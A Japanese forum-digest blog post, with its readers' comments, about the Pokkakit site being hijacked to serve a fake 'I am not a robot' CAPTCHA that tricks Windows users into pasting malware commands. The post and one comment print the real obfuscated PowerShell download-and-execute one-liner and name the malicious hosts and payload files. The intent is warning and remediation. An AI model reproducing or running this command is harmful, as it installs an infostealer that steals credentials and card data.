【緊急速報】ポッカキットさん、不正アクセスによる乗っ取りでマルウェア感染源に…グロ愛好家のPCが多数死亡との被害

【🚨緊急速報🚨】ポッカキットがマルウェア感染源に?!

【🚨緊急速報🚨】あの「ポッカキット」がマルウェア感染源に?!お前らのPC、マジで大丈夫か?

1: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:36:34.488
これ普通にマルウェアかかってる人多そう
shoko-nakagawa-switch2-1.jpg

何が起きたのか?その概要と被害範囲

ポッカキット運営事務局からの報告によると、以下の内容が判明している。

  • 発生日時: 2025年6月23日(月)午前4:00頃 ~ 午後3:00頃
  • 影響範囲: ポッカキットサイト内の一部の投稿ページ
  • 被害内容: 上記時間帯に、該当ページに外部の不正なサーバーへ誘導するスクリプトが埋め込まれていた。

この期間に、改ざんされたページをWindows搭載のパソコンで閲覧し、画面に表示された偽の警告メッセージなどの指示に従って以下の操作を完了してしまった場合、マルウェアをダウンロード・実行させられた恐れがある。

  1. Win + Rキーで「ファイル名を指定して実行」を開く
  2. Ctrl + Vキーでクリップボードにコピーされた文字列を貼り付ける
  3. Enterキーで実行する

※スマートフォン(iPhone・Android)やMacユーザーは、現時点では実害は確認されていないとのことだ。


もしかして俺も!?対象となる可能性のあるユーザーはここを確認!

ポッカキット運営事務局は、以下の条件に該当するユーザーにPCの確認を強く呼びかけている。

  • 2025年6月23日(月)午前4:00 ~ 午後3:00頃に、ポッカキットをWindowsパソコンから閲覧した人
  • 上記時間帯のアクセス時に、偽の警告画面が表示されたり、意図しないファイルのダウンロードが発生したりした記憶のある人
  • PC内に dns.pdf や、通常とは異なる場所(例:ダウンロードフォルダ、デスクトップなど)に csrss.exe など、見覚えのないファイルが保存された記憶のある人

一つでも当てはまるなら、すぐに次の「お客様へのお願いと推奨されるご対応」に進んでくれ!


今すぐ行動しろ!不安な場合はこの対応を推奨!

もし自分のPCが対象になるかもしれない、と少しでも不安を感じたら、以下の対応を速やかに実行することが強く推奨されている。

  1. ウイルス対策ソフトによるフルスキャン: お使いのウイルス対策ソフト(Microsoft Defender、ウイルスバスター、ノートン、Malwarebytesなど)を最新の状態に更新した上で、PC全体をスキャン(フルスキャン)して、マルウェアが潜んでいないか徹底的に調べよう。
  2. 不審なファイルの確認: PC内に csrss.exedns.pdf といった見覚えのないファイルが存在しないか確認すること。特にcsrss.exeはシステムの重要なファイルだが、ダウンロードフォルダやデスクトップなど、通常とは異なる場所に存在する場合はマルウェアである可能性が高い。
  3. システムの復元: もしマルウェア感染が強く疑われるなら、Windowsの「システムの復元」機能を使って、問題が発生する前の安全な時点にPCの状態を戻すことで、症状が改善する場合がある。
  4. 専門家へのご相談: 不審な動作が続く、自分で対処するのが難しいと感じる場合は、PCの初期化や、お近くのPC修理業者、セキュリティ専門家への相談を真剣に検討してくれ。

ポッカキット運営の対応状況と今後の誓い

今回の事態を受け、ポッカキット運営事務局は迅速な対応を行っている。

  • 改ざんされたページの特定と、不審なスクリプトの完全削除を完了済み。
  • サーバー全体の脆弱性スキャンとセキュリティ強化対策を継続中。
  • 攻撃経路の特定調査、およびJPCERT/CC(日本コンピュータセキュリティインシデント対応チーム)、ホスティング事業者へのインシデント報告を進行中。
  • 監視体制の強化と、定期的なセキュリティチェック体制の導入を完了済み。

運営事務局は「今後は、より一層のセキュリティ対策強化と監視体制の徹底に努め、再発防止に全力を尽くしてまいる所存でございます」と表明している。

長年お世話になってる人もいるだろう、あのエログロサイトの金字塔**「ポッカキット」が、なんとマルウェア感染サイトに変貌している**との衝撃情報が飛び込んできたぞ。SNSや掲示板では既に阿鼻叫喚、お前らの大事なPCやスマホが危ないかもしれない。


一体何が起きてるんだ?

ポッカキットのサイトにアクセスすると、突然「ロボット認証」を装った怪しい画面が表示されるらしい。ここで指示に従って操作してしまうと、あなたのPCに悪質なプログラム、つまりマルウェアが勝手にインストールされる仕組みになっているんだ。

特にヤバいのは、このマルウェアがPowerShellというWindowsの強力な機能を使って、外部からスクリプトをダウンロードし、「csrss.exe」というWindowsの正規プロセス名を偽装した実行ファイルを隠れて動かす点だ。これによって、あなたの個人情報(ID、パスワード、クレジットカード情報など)がごっそり盗まれる「インフォスティーラー」系の被害に遭う可能性が指摘されている。


具体的にどんな手口で感染させるんだ?

スレッド内で共有された情報によると、その手口はかなり巧妙だ。

  1. サイトにアクセスすると、ロボット認証画面が表示される。
  2. この画面で変な操作を要求され、指示に従うと、PowerShellの危険なコマンドがクリップボードにコピーされる。
    • そのコマンドがこれだ! powershell -No"P"ro"f"ile -w h -C"o"mmand "iex (iwr -Uri 'https://s4m";ed"solu"t"ions.c"om/jh"bbnmo"ihub"njmo.txt' -Us"e"Basi"cPa"rs"i"ng)";
  3. さらに「Windowsキー + R」で「powershell」を開き、「Ctrl + V」でクリップボードのコマンドを貼り付け、エンターを押すように誘導される。

こんな面倒なこと、普通の人間ならやらないと思うだろ?だが、焦ってしまったり、よくわからないまま指示に従ってしまうと、マジでヤバいことになる。


「見ただけ」じゃダメなのか?感染してるかどうかの確認は?

安心しろ。現時点の情報では、サイトを「開いただけ」で即座に感染することはないようだ。あくまで、誘導されるままにPowerShellコマンドを実行してしまった場合に感染する。

「自分は大丈夫かな?」と心配になったら、以下の点を確認してみよう。

  • 指示されたPowerShellのコマンドを自分で実行してしまったか? もし実行してしまった場合は、即座に対応が必要だ。
  • 最近PCの動作がおかしい、重くなったと感じるか?
  • 身に覚えのない請求や、ログイン履歴がないか?

もし感染してしまったら、どうすればいい?

万が一、指示に従ってコマンドを実行してしまった場合は、今すぐ以下の対応をとってくれ!

  1. ネットワークから切断する:LANケーブルを抜くか、Wi-Fiを切断して、インターネットから隔離しよう。
  2. ウイルス対策ソフトでフルスキャンする:最新の状態にアップデートしたウイルス対策ソフトで、PC全体をスキャンしてマルウェアを検出し、駆除しよう。
  3. パスワードを変更する:念のため、重要なサイト(銀行、SNS、メールなど)のパスワードは、別の安全なデバイスから変更しておこう。
  4. 専門家に相談する:もし被害が疑われる場合や、自分で対処できないと感じたら、迷わずPC修理業者やセキュリティの専門家に相談することをお勧めする。最悪の場合、OSの再インストールも視野に入れる必要があるかもしれない。

今後の対策と注意点

今回の件は、アダルトサイトに限らず、どんなサイトでも罠が仕掛けられている可能性があることを改めて教えてくれた。

  • 怪しいポップアップや指示には絶対に従わないこと。
  • 身に覚えのないファイルやプログラムは絶対に実行しないこと。
  • OSやセキュリティソフトは常に最新の状態に保つこと。
  • PowerShellのような強力なツールを安易に使うのは避けること。

今回の件で、お前らのPCが乗っ取られたり、大事な情報が抜き取られたりすることがないよう、くれぐれも注意してくれよな!

2: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:37:11.828
マジかよww見に行こ
3: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:38:01.520
それでロボット操作窓でてたのか
あれ引っかかるやついないだろ
4: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:39:30.383
最近エロ動画収集の担当バイト募集してたけどそれに関係あるのかな
5: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 08:43:49.951
esetに弾かれたわ
6: 以下、5ちゃんねるからVIPがお送りします 2025/06/23(月) 09:15:39.211
コマンド入力したらアウト…?

スレッドは、エログロサイト「ポッカキット」が乗っ取られ、アクセスするとマルウェアをインストールさせる仕組みになっているという情報について議論しています。

以下に議論の要点をまとめます。

マルウェアの仕組みと危険性:

  • サイトを開くと特定の操作(ロボット認証に見せかけたもの)を要求され、それに従うとマルウェアがインストールされる。
  • 具体的な手法として、PowerShellのInvoke-Expression (iex) とInvoke-WebRequest (iwr) を用いて、リモートのスクリプト(s4medsolutions.com/jhbbnmoihubnjmo.txt)をダウンロードし、実行させる。
  • ダウンロードされるスクリプトは、さらに別の悪意のあるファイル(例: www.halittlelliglu.com/dns.pdfと見せかけたcsrss.exe)をダウンロードし、隠しプロセスとして実行させる。
  • PowerShellの実行ポリシーを一時的にバイパスするSet-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Forceも使われている。
  • これにより、ユーザーのID、パスワード、クレジットカード情報などが盗まれる「インフォスティーラー」系のマルウェアである可能性が指摘されている。

ユーザーの反応と懸念:

  • サイトを開くだけで感染するのか、指示に従わないと大丈夫なのかといった疑問が多く挙がっている。
  • 多くの意見は「指示に従ってPowerShellコマンドを実行しない限りは感染しない」という見方を示しているが、一部では「開くだけでアウト」と誤解しているユーザーもいる。
  • Clipboardにコマンドがコピーされ、それをユーザーに貼り付けさせて実行させるという手口の巧妙さが指摘されている。
  • 「高齢ネトウヨの巣窟」「グロ好きの弱者男性大敗北」など、サイトの利用者層を揶揄するコメントも散見される。
  • 「踏み台にされて警察が来る」といった二次被害の懸念も示されている。

その他:

  • マルウェアのコードの一部が貼られ、その危険性が解説されている。
  • スクリプトに文法ミスや不完全な構文が含まれており、意図的に自動解析を避けるための「壊れた」構文である可能性も指摘されている。
  • なぜエログロサイトにウイルスが集まるのかという疑問も挙がっている。

全体的に、今回の乗っ取りはユーザーの心理を巧みに利用した、比較的巧妙な手口のマルウェア攻撃であると認識されています。

名無しさん June 23, 2025 16:30 返信
何か操作しろとか怪しい表示されてたからスルーしてたは
無料のadwcleanerとかでチェックした方がいいかもね
①私はロボットではありません←ここでクリップボードにコードがコピーされる
②Windowsボタンと「R」を押す
③「CTRL」と「V」を押す
④「Enter」を押す
④までやっちゃった人はちゃんと駆除しましょうね
名無しさん June 23, 2025 16:44 返信
えらくお粗末な感染仕様だな
せめて1ストップで感染するようにしないと効果少ないでしょ
名無しさん June 23, 2025 16:46 返信
ワイLinuxだけど、全部やっちゃった
ちなPowerShellは入ってない
名無しさん June 23, 2025 17:03 返信
3までやったけど危なかったわ
名無しさん June 23, 2025 17:29 返信
2まで素直にやっちゃって、これはヤバイと気づいた。
やっちゃった人、何が実行されたのか教えて。
名無しさん June 23, 2025 17:31 返信
まぁこれニュースで見た手口だからメモ帳にCtrl+Vして
プークスクスしました
名無しさん June 23, 2025 18:28 返信
Windowsボタンと「R」を押すを見てヤバイと察知したw
名無しさん June 23, 2025 15:56 返信
え?感染してんじゃん
ヤバw
名無しさん June 23, 2025 16:06 返信
最初ぽちっただけなら大丈夫。その後の指示通りに「ファイルを指定して実行」画面を開いてコマンドを実行するとアウト。
名無しさん June 23, 2025 16:22 返信
あのPowershellがどうのこうのってやつ?
ワイ、LinuxだからPowershellとかよくわからない
名無しさん June 23, 2025 16:01 返信
やっぱハックされてたんだ、入力しそうになったわあぶね~
名無しさん June 23, 2025 16:03 返信
原因はなんだよ?せめて原因は公表しろよ。
自身のミスか?あなたも同じような指示系ウイルスで指示通りやっちゃった口か?
あれ指示通りやると普通にいろんなアカウント乗っ取られるぞ。
対応策はありません。抜かれたら最後です。相手よりも先にアカウントのパスワードやユーザー名を変えるぐらいですかね。そしてPCをクリーンインストール。と言っても相手も素早いので大概負けます。
名無しさん June 23, 2025 16:03 返信
指示通りに操作すると操作者には分からないところで別サイトからファイルをダウンロードして ファイルの拡張子をpdfからexeに変えて実行させる仕組みになってた。exeの中身は見ていないからどんな被害を受けるかはわからない。
名無しさん June 23, 2025 16:07 返信
すげーなクリップボードにコマンド勝手に入ってた
エンター押したら終わってた
名無しさん June 23, 2025 16:30 返信
ワイもロボットじゃないにチェック入れた後、
クリップボードにPowershellのコマンドが入ってた
訳わかんないから消したけど、Linuxだから影響はないと思ってる
名無しさん June 23, 2025 18:31 返信
君の個人情報付きでダークウェブに晒されるだけだから安心しろ
名無しさん June 23, 2025 16:18 返信
「その「私はロボットではありません」は本物? マルウェア感染狙う“偽CAPTCHA”出現 米Microsoftが注意喚起」
↑この手口
名無しさん June 23, 2025 19:19 返信
なぜキャプチャ偽装でやるかっていうと、コピペのコマンドが、クリック動作なしだと拒否するブラウザの防御があるからなのよね。
名無しさん June 23, 2025 16:22 返信
まじでやばかった。普通にポチるとこだった。
名無しさん June 23, 2025 16:23 返信
押してもないのに押した判定される広告のバグとかがまだ残ってますよ
名無しさん June 23, 2025 16:25 返信
スマホで良かったわ
名無しさん June 23, 2025 16:26 返信
被害の具体的な情報が欲しい
感染したOS、何をしたらマルウェアが実行されるか等
「閲覧は自己責任w」じゃ済まないぞ!
名無しさん June 23, 2025 16:32 返信
しょっぱなPowerShellだからWindowsじゃないと感染できない
名無しさん June 23, 2025 16:42 返信
俺、Linux(ubuntu)でここ見てたんだが、
Linux向けのPowerShellインストールしてないし、大丈夫かと思ってる
名無しさん June 23, 2025 16:49 返信
実際ほとんどの閲覧者はLinux(android)じゃないかな
名無しさん June 23, 2025 16:33 返信
Safariなら大丈夫だよね?
名無しさん June 23, 2025 16:35 返信
WPの脆弱性でも突かれたかね。
名無しさん June 23, 2025 16:40 返信
「ファイル名を指定して実行」にコマンドコピペしろってやつだから
脆弱性ではないよ(強いて言えばそんなことをする人間が脆弱性)
FORMAT C: とか DEL C:\ とか打たせて消えたとか言われても
それ脆弱性はじゃないでしょ
名無しさん June 23, 2025 17:08 返信
>強いて言えばそんなことをする人間が脆弱性
www
名無しさん June 23, 2025 19:59 返信
これは、不正ログインによる改竄がWPの脆弱性を突かれたのではって話だなw
名無しさん June 23, 2025 16:36 返信
ttps://imgur.com/Gxh82MZ
クリップボードに勝手に入った文字列のコピー
規約違反ならイムガーから削除します
名無しさん June 23, 2025 17:08 返信
ファイル名見切れてる jhbbnmoihubnjmo.txt
に記載のdns.pdfをtempにcsrss.exeとして落として実行
(system32のcsrss.exe自体はシステムファイルなので削除しちゃだめ)
もちろんWindowsでしか動かない
拾ってみたけど難読化されている上に11MBと巨大なので解析はパス
名無しさん June 23, 2025 17:28 返信
クソデカいと思ったらこれランタイム込みのPythonスクリプトだな
Nuitkaって難読化コンパイラ使ってる
Vista以上かつ64bitじゃないと動かないからXPとか10の32bitとかはセーフ
覗こうと思ったけど逆コンパイラが64bitでしか動かないからやっぱりパス
名無しさん June 23, 2025 16:36 返信
やっぱりハックだったか。あの画面出た瞬間閉じてたわ
名無しさん June 23, 2025 18:05 返信
っぱ常日頃から疑ってないとな!
逆に聞きたいんだけど全部指示通りにしたやつはページ見れたの?
名無しさん June 23, 2025 18:11 返信
指示は不正ファイルのダウンロード&実行だからページを開くとかはない
名無しさん June 23, 2025 16:40 返信
iPhoneで良かったぜ!
本物のCAPTCHAやreCAPTCHAの認証プロンプトもたくさんありますが、「特定のキーの組み合わせを押してください」とか「デバイスでコマンドを実行してください」といった指示が含まれるものは、間違いなく偽物です。
名無しさん June 23, 2025 16:40 返信
令和の時代にこんなん引っかかるヤツおるんか
名無しさん June 23, 2025 16:53 返信
むしろ(脱獄でもしない限り)ユーザーに管理者権限が無い
スマホキッズだらけだから簡単に引っかかるんだよ
未知の脆弱性を突くような高度なウイルスは激減して
自分でIDやらパスやら入力させるフィッシングサイトだらけだし
名無しさん June 23, 2025 16:58 返信
余裕ぶっこいてるお前みたいなんが一番危険やぞw
名無しさん June 23, 2025 16:48 返信
Mac無反応で助かったわ
名無しさん June 23, 2025 16:52 返信
さんざんニュースにもなってた手法なのに引っかかるやつおるんか
名無しさん June 23, 2025 17:10 返信
アマプラやネトフリがタダになるとか言ってばら撒かれたやつと同じ手口だし
テレビ見ない! ニュース見ない! とか言ってるスマホキッズが引っ掛かる
名無しさん June 23, 2025 17:46 返信
Twitterでよく流れてくる「ここからアクセスすれば、無料で見れます」ってやつね
名無しさん June 23, 2025 16:58 返信
件のClickFixの仕様上Windows環境が対象だから、情弱の多いスマホ勢は認証しようとして出来なかったとか多そう
名無しさん June 23, 2025 17:03 返信
うわ・・あれポッカの仕様でも、googleの仕様でもないのか。全部従っちゃった。
名無しさん June 23, 2025 17:03 返信
俺普通にチェックボタン押してもうたんやけど感染確認ってどこでやるん?
名無しさん June 23, 2025 17:12 返信
その後のWin+Rでファイル名を指定して実行でコマンド入れなきゃ問題ない
つかスマホだとそもそもWinキーって時点で相手にされてないでしょ
名無しさん June 23, 2025 17:43 返信
LinuxだがWin+Rやっても無反応だし、ターミナルに例のPowerShellのコマンド入れても無反応だろうから、とりあえず大丈夫かなと思ってる
名無しさん June 23, 2025 17:22 返信
Windowsならネット接続を切ってオフラインスキャンを必ずして下さい
全ファイルチェックには時間を要するでしょうが必要な処置です
名無しさん June 23, 2025 17:08 返信
クリックした人は情報抜かれたかもしれんね
名無しさん June 23, 2025 17:10 返信
最悪や カードとかも抜かれるのこれ?
名無しさん June 23, 2025 17:25 返信
最後までやってたら残念ながら抜かれた後だろう
名無しさん June 23, 2025 19:16
クレカ番号とか入れとくなよw
名無しさん June 23, 2025 17:25 返信
ブラウザにカード番号とか保存してたら抜かれた可能性あるんじゃね
名無しさん June 23, 2025 17:19 返信
スマホもmacもLinuxもセーフ
やられるのはWindowsだけ
名無しさん June 23, 2025 17:11 返信
チェックしただけならセーフだから安心しろ
名無しさん June 23, 2025 17:19 返信
案内のコマンド入力したけど何も無かったよ。
何故ならアドブロック沢山入れてるからね♡リンクページが開く事は無いのだ
名無しさん June 23, 2025 17:52 返信
釣りなのかなー?表示せずに実行する一文が含まれてたけど・・・
名無しさん June 23, 2025 17:20 返信
そもそも感染したことに気づいてないやつがどのくらいいるんだろうな
サイト開いたらこういう画像が出てて、何をした人がアウトだったかくらい書き残してやれよ
名無しさん June 23, 2025 17:20 返信
指定のキーをいくつか押したらコマンドが出て来て
指示通りもう一度キーを押したら無反応だった、アウト?
名無しさん June 23, 2025 18:31 返信
アウトです
実行に失敗すればエラーがでますが
成功した場合は感染したことがバレないように
何も無かったような振る舞いをします
名無しさん June 23, 2025 17:21 返信
だからアバストが反応したのか
お疲れ様でした
名無しさん June 23, 2025 17:21 返信
4までやらなきゃ基本セーフ
心配ならスキャンしとけディフェンダーでも検出できるとよ
名無しさん June 23, 2025 17:22 返信
せめてこういう画像が出てました
指示通りに入力した人はアウトですくらい教えてやれよ
多分感染に気づいてないやつ大勢いるだろ
名無しさん June 23, 2025 17:30 返信
気づいて入力しなかったけど、あれ引っかかった馬鹿いるんだw
名無しさん June 23, 2025 17:30 返信
まぁすぐ分かるやろ感染するような操作する情弱いい勉強になったろ
名無しさん June 23, 2025 17:37 返信
勉強になっていないと思う
新手のウイルスが登場したらまた感染するだろうし、
感染したことにも全く気づいてなく自分は大丈夫だと思っている
名無しさん June 23, 2025 17:40 返信
いつもと違う操作が出たらすぐ閉じてググれって事だ
所見の奴は知らん
名無しさん June 23, 2025 17:57 返信
ここを読んでる時点でちょっとでも心配になる奴はクイックスキャンくらいとっくにしてるだろ。それすらしないままの奴は救いようのない情弱で勉強の段階にもないアホだけや
名無しさん June 23, 2025 17:35 返信
問題はポッカのサイトのIDパスが漏れてた(不正ログイン)こと
どこから漏れたのか(更新に使ってるPCが感染してる等)を
突き止めて対処しないと再発するよ
名無しさん June 23, 2025 17:43 返信
チェックだけなら大丈夫。コマンドにコピペして実行したら、マルウェア仕込まれて情報抜き放題。
すぐにオフラインにして、セキュリティスキャンとマルウェア除去が必要
名無しさん June 23, 2025 17:43 返信
Windowsキー無効にしててよかったわ
名無しさん June 23, 2025 17:48 返信
もうクレカの情報抜かれとるかな
名無しさん June 23, 2025 18:06 返信
そらこんなやばい動画やってりゃそういうのはあるだろうな
惰性でやってたせいでセキュリティ検査なりサーチルーツのアプデとか怠ったんやろ。
名無しさん June 23, 2025 18:13 返信
これからポッカ見る時は仮想化環境からにした方が安全かも
名無しさん June 23, 2025 18:17 返信
この手のサイトはスマホで見るに限る
名無しさん June 23, 2025 18:19 返信
ESETが「Fakeトロイが云々~」警告出してきたのでページ開かなかった
名無しさん June 23, 2025 18:34 返信
ディフェンダーじゃページ自体は開いちまうからやっぱ弱いんやな
名無しさん June 23, 2025 18:20 返信
Windowsウイルスと脅威の防止から
保護の履歴を確認してブロックされていれば大丈夫
それ以外は操作しちまったやつはアウト
名無しさん June 23, 2025 19:09 返信
ダークウェブに抜かれたものを晒されるとgoogleさんから即通知来るから安心して眠れ
名無しさん June 23, 2025 19:23 返信
チェック項目がおかしいなって思ってチェックボックスにクリックした後にコピペを確認したら思いっきり変な操作がコピーされててやばいと分かったわ
名無しさん June 23, 2025 19:27 返信
mac最強
名無しさん June 23, 2025 19:58 返信
まあ一番やばいのは管理人自身やもしれんなw
どっかで食らってんだからw
名無しさん June 23, 2025 20:07 返信
動画再生しようとして、エロサイトに飛ばされたお前は感染してるぞ。
名無しさん June 23, 2025 20:50 返信
クリップに残ってた
これやな
powershell -No”P”ro”f”ile -w h -C”o”mmand “iex (iwr -Uri ‘https://s4m”ed”solu”t”ions.c”om/jh”bbnmo”ihub”njmo.txt’ -Us”e”Basi”cPa”rs”i”ng)”;
※このPowerShellコマンドは非常に危険です。悪意のあるスクリプトを実行しようとするものです。
何が危険なのか
難読化と隠蔽: コマンド内の不自然な引用符や、ウィンドウを非表示にするオプション(-w h)は、セキュリティソフトウェアによる検知を避け、ユーザーに気づかれずに動作させるための手法です。
不明なURLからのダウンロードと即時実行: 見慣れないウェブサイトからファイルをダウンロードし、その内容を直接スクリプトとして実行(iex)しようとします。これはマルウェア感染や情報窃取によく使われる手口です。
リスクと推奨事項
このコマンドを実行すると、コンピューターがウイルスに感染したり、個人情報が盗まれたりする深刻な被害を受ける可能性があります。
絶対にこのコマンドを実行しないでください。
名無しさん June 23, 2025 21:02 返信
全部やってしもたわ。
なんか実行されてたわ。
セキュリティー入れてへんわ。
ウインドーやわ
名無しさん June 23, 2025 21:12 返信
Safariだとロボットにチェック入れた後なんもできんかったからセーフやったわ

この記事へのコメント